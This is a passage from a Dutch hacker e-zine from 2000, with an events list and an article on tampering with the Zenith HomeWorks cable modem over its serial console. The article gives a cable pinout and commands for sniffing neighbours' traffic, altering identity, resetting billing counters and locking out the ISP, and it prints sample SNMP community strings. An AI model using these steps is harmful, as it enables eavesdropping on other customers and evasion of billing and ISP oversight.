FIN = Deze flag laat de ontvangende TCP-module weten dat de zender klaar is
met sturen. Deze flag stopt de data-stream in een richting. De Ontvangende
TCP-module moet ook een msg sturen met de FIN-flag om de connectie helemaal
te sluiten.

Zo, dit was een korte introductie in TCP-flags, voor meer informatie raad ik
aan om RFC's, andere boeken, text-files en documenten over TCP/IP te lezen.

Spreaded by Neon-Lenz® and The Millennium Hackers Association.
Copyrighted and All Rights Reserved®
E-Mail:neonlenz@hackermail.net
-2000- http://www.mha1.8m.com

Vertaald door H4H, 2000

-------------------------------------------------------
08. Evenementen
-------------------------------------------------------
Helaas ,voor de meeste is het wachten op de volgende www.hit2000.org
Hier een overzicht van de aanstaande evenementen.

TILF-meeting

URL: http://tilf.ods.org
Datum 14/04/2000 tm 15/04/2000
Locatie Haarlem


HOPE 2000

URL: http://www.h2k.net
Datum: 14/07/2000 tm 16/07/2000
Locatie: New York, New York Hotel Pennsylvania


Defcon 2000

URL: http://www.defcon.org
Datum: 28-07-2000 tm 30-07-2000
Locatie: Las Vegas, Nevada USA


Weet jij nog IT / Security evenmenten op te noemen mail het dan door
naar h4h-redactie@hackers4hackers.org

-------------------------------------------------------
09. Zenith Kabelmodem
-------------------------------------------------------
[Dit artikel is Annoniem binnen gekomen via bronnen rondom HIT2000
(waar vrijwel alle leden over kabelmodem beschikken). Deze vinden
het een kwalijke ontwikkeling, dat dit soort dingen in huidige tijd
nog kunnen. Zij vertrouwen erop dat de desbetreffende ISP op korte
termijn problemen oplost, en hopen dat men dit keer wel bewust met
privacy, beveiliging en kwaliteit van kabelinternet omgaat. ]

Kabelmodem bewijst dat hij uitermate geschikt is voor misbruik door criminelen.
Door dat gehele kabelmodem is configureren is door iedereen, kan in eens alle
langskomende verkeer getapt worden, waardoor verhandelingen en passwords die
andere kabelmodem gebruikers in zelfde ring gebruiken in 1 klap door iedereen
die onderstaande handelingen verrichten leesbaar en uiteraard te veranderen.

Ook kan iemand zijn gegevens veranderen waardoor hij als het ware kan
onderduiken, doordat hij gegevens kan invoeren die hij wilt wordt hij
vrijwel ontraceerbaar, men kan slechts hooguit de wijk aanwijzen waar
diegene zich bevind, maar de indentiteit en exacte locatie kan slechts
worden vastgesteld door kabel voor kabel in elke straat te gaan meten, dit
onzettende karwei staat in geen verhouding tot de enkele seconden die iemand
nodig heeft om zijn identiteit weer te veranderen, of terug te veranderen.

Ook kan de teller op nul worden gezet, en de wachtwoorden van de beheerders
worden gewijzigd, waardoor beheer van afstand onmogelijk is geworden, en het
van afstand afsluiten van wanbetalers onmogelijk wordt, dit in combinatie
met bovenstaande maakt de kabelmodem uitermate geschikt voor criminele
doeleinden.
--
HOMEWorks Universal V10.3, 4 Mbps

Multiweb(tm) Zenith(tm) HomeWorks 4Mbps kabelmodem instellingen aanpassen:

Het kan onder sommige omstandigheden handig zijn de instellingen van je
kabelmodem te kunnen bekijken en/of wijzigen. Bijvoorbeeld om te kijken of
een storing aan jouw aparatuur ligt of weer eens te wijten is aan slecht
functionerende hardware bij de provider (in dit geval dus
TFI/Sonera/Multiweb).
De mogelijke instellingen omvatten ondermeer het aan en uitzetten van het
transparant doorgeven van alle verkeer op de bus (zodat je netwerk
kaart(en) dus alle pakketjes data van alle andere kabelmodems op het
(virtuele) segment kunnen zien), Instellen van User en Password (om te
zorgen dat derden (dus ook de ISP!) niet meer op jouw gehuurde/in
bruikleen zijnde kabelmodem kunnen inbreken om wijzigingen te maken in de
configuratie :), het mogelijk maken andere netwerk kaarten aan te sluiten
met een ander MAC address en/of IP address (dit laatste in overleg met de
isp, MAC addressen (hardware addressen van onderandere netwerk kaarten
zijn uiteraard gewoon jouw zorg als klant, de electriciteits maatschappij
moet ook niet zeuren als je een andere gloeilamp aansluit, sommige
inferieure kabelinternet aanbieders zien dit helaas anders in). Het
resetten van de interne trafficmeters van het modem behoord ook tot de
mogelijkheden (let wel op: bij sommige contracten kan dit problemen bij
de facturering tot gevolg hebben).

Om dit te bewerkstelligen zul je een kabeltje moeten
maken die je kan aansluiten op de RJ11 (modular phone) aansluiting op het
kabelmodem (die 'kleinere' UTP stekker met RS232 eronder).

benodigdheden: DB25 of DB9 Female connector naar keuze
1 meter 4 polig telefoon snoer (plat) en een krimp rj11
connector of een half telefoon aansluit snoer ;-)

enig meet, beun en soldeerpook werk leverde het volgende schema op:

TERMINAL MODEM

RXD-------------RXD
TXD-------------TXD
GND-------------GND

RTS-\
CTS-/

DSR-\
DCD-|
DTR-/

Aan de terminal kant zijn 2 verschillende aansluitingen gebruikelijk
namelijk DB-9 en DB-25 (beiden female op de kabel, male op de terminal)

de pin nummers die bij de namen horen staan hieronder:
DB-9: DB25: RJ11: NAME:
1 8 - DCD (Data Carrier Detect)
2 3 3 RXD (Receive Data)
3 2 2 TXD (Transmit Data)
4 20 - DTR (Data Terminal Ready)
5 7 1,4 GND (Ground)
6 6 - DSR (Data Set Ready)
7 4 - RTS (Ready To Send)
8 5 - CTS (Clear To Send)

(note de rj11 connector is een 6 polige utp modularie krimp connector,
echter meestal zijn alleen de 4 middelste pinnetjes voorzien van
contactstrip, de nummering in dit schema is daar dus ook op gebaseerd ;)
(de buitenste 2 zijn allebij ground en de middelste 2 zijn RXD resp. TXD)

DSR, DTR, en DCD moeten met elkaar verbonden worden om de on-line detectie
voor de gek te houden op de terminal
RTS en CTS moeten met elkaar verbonden worden om de handshake voor de gek
te houden (het modem heeft geen handshake en flowcontrol lijnen en sommige
terminal apparatuur verwacht dat wel, dus geven we de terminal zijn eigen
signaal weer terug om um voor de gek te houden).

Als je even geen RJ11 krimp tool/plugje (gewoon een tang om modulare
stekkertjes op telefoonkabels te zetten... gesignaleerd voor 5 piek in
de kortingbak bij gamma ;) hebt kan je gewoon een telefoon snoer in tweeen
knippen en aan een kant een female RS232 stekker naar keuze solderen
volgens bovenstaand schema (mocht het niet werken, probeer dan eens RXD en
TXD om te draaien, dit is zowat het enige dat mis kan gaan)

Goed het tijdpunt om eea aan het werk te gaan zetten is nu aangebroken.
Stop het 'telefoon stekkertje' in het kabelmodem (dus in de RS232 port
NIET de ethernet port) en de DB9 of DB25 in je terminal of computer met
terminal emulatie programma (minicom, telix, hyperterminal, whatever)
stel de terminal af op 8 databits, 1 stopbit, no parity, 9600 bps.

een ram op enter moet nu de prompt van het kabelmodem presenteren:

>

als dat zo is dan heeft het gewerkt. (als dat niet zo is probeer dan even
RXD en TXD om te draaien (de middelste 2 pinnetjes van het
'telefoonpluggie')

hieronder een opsomming van de commandos van het kabelmodem:

hint: blijf van het LOCK commando AF!

>help
Serial Interface v1.0
Commands
SB Dump Broadband Statistics
SE Dump Ethernet Statistics
SA Dump Broadband and Ethernet Statistics
SCB Clear Broadband Statistics
SCE Clear Ethernet Statistics
SCA Clear All Statistics
SI Show system information
PR <name> Read value of named parameter
PD Dump all parameters to screen
PS <name> <value> Set value of named parameter
FD Dump filter table
FC Clear filter table
PW1 Write parameter changes to memory
PW2 Write parameter changes to FLASH
PW3 Write parameter changes to both memory and FLASH
LOCK Lockout further changes
RANGE Autorange Interframe Spacing

Parameter names and data formats
TXFQ Transmit Frequency (nnn.nn)
RXFQ Receive Frequency (nnn.nn)
TXPW Transmit Power Level (nn)
IPAD IP Address (nnn.nnn.nnn.nnn)
SMSK Subnet Mask (nnn.nnn.nnn.nnn)
MGR1 Primary Manager Id (nnn.nnn.nnn.nnn)
MGR2 Second Manager Id (nnn.nnn.nnn.nnn)
MGR3 Third Manager Id (nnn.nnn.nnn.nnn)
TRAP SNMP Trap Destination (nnn.nnn.nnn.nnn)
PLSZ Plant Size (nn)
OLDP Use Old Plant Size (Y/N)
IFFX Fixed Interfame Spacing (Y/N)
RWCO SNMP Read-Write Community (c...c)
ROCO SNMP Read-Only Community (c...c)
CMNT Comment (c...c)
TSCT Test Pattern Count (nnnnn)
FMOD Filter Mode (0=None/1=Mac)
FLMD Filter List Mode (0=Temp/1=Perm)
FMAX Filter List Max Length (0 - 4)
FTRP Max Filter Overflow Traps (nnn)
TELC Telco Mode (Y/N)
PIPO Pass IP Only (Y/N)
TXLM Transmit Throttle (nn)
>

een voorbeeld configuratie zoals in gebruik bij multiweb:
het is handig van te voren ff je instellingen ergens te cut en pasten en
bewaren ;)

>pd
RXFQ 362.75
TXFQ 53.0
TXPW 15
IFFX Yes
PLSZ 15
OLDP No
IPAD 172.19.x.x <--- deze heb ik uiteraard gecensureerd
SMSK 255.255.192.0
MGR1 255.255.255.255
MGR2 255.255.255.255
MGR3 255.255.255.255
TRAP 0.0.0.0
RWCO Dfrg56hj
ROCO duncan123
CMNT loginnaam@multiweb <--- deze ook ;)
FMOD 1 - Mac
FLMD 1 - Perm
FMAX 1
FTRP 0
TELC No
PIPO Yes
TXLM 2
TSCT 0
>

--
PUBLICATIE VOOR EDUCATIEVE DOELEINDEN!
GEBRUIK VAN DEZE INFORMATIE IS OP EIGEN VERANTWOORDELIJKHEID!
De autheur van dit artikel en de redactie van H4H neemt uitdrukkelijk afstand
van enigerlei aansprakelijkheid voor enigerlei gevolg, inclusief juridische
en/of financieele schade, van het gebruik of misbruik van de informatie in dit
artikel. Dit artikel is Public-Domain. Copyright is niet voorbehouden aan
autheur of enig ander (rechts) persoon.

Zentith, HomeWorks, Sonera, TFI en Multiweb zijn geregistreerde
handelsnamen van hun respectievelijke houders.

-------------------------------------------------------
10. Eindwoord
-------------------------------------------------------
Deel 7 is uit. En hiermee hebben we de toon gezet om hackers4hackers vaker te
laten verschijnen en dus ook iets minder artikelen dit keer. Deel 8 verwachten
we binnen 3 weken (maar spreek ons er niet op aan als het niet lukt omdat we
altijd afhankelijk zijn van de artikelen die we binnen krijgen) Ook met de zomer
vakantie voor de deur is het misschien interessant voor schrijvers om daar
aandacht aan te gaan besteden.

Ook wordt er dor nighthawk druk gewerkt aan een artikel over de meeting de we de
volgende keer hopen te plaatsen. Alleen moeten we hem af en toe wat afremmen
omdat het artikel eerder op een flame zou gaan lijken dan een verslag ;)

Zoals gemerkt is het archief opgeknapt. Als er ideeën zijn om ook van dit soort
kleine verbeteringen de site mooier te krijgen horen we dat graag.

Ook heeft het ons verbaasd hoe snel er op een nieuwe poll gestemd wordt. Dus
zullen we de poll in de toekomst ook zeker meer gaan gebruiken snel een mening
van de lezers terug te krijgen! Stem ondertussen even op onze nieuwe poll over
hoe iedereen de meeting ervaren heeft.

Ook een reden om de site en het archief aan te passen is de hoeveelheid bezoekers
die wij iedere dag mogen ontvangen op de h4h site (gemiddeld 250 per dag). Door
de delen nu zo te maken dat de lezers maar 1 artikel te gelijk downloaden is de
hoeveelheid traffic terug gelopen.

Sommige mensen denken dat we www.hackers4hackers.org op één van onze eigen
computers hosten. Dit is niet zo. De site wordt gehost door Demon Internet LTD
In onze log staan regelmatig portscans en cgi scans. We vragen iedereen
vriendelijk dit niet te doen. Omdat dit dus geen zin heeft. En je gegarandeerd
een klacht van DEMON kan verwachten naar je provider. Dit is dus anders dan dat
er een gebruiker van demon klaagt en zodoende wordt er alerter op gereageerd!
Pas dus op!

(De redactie)

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT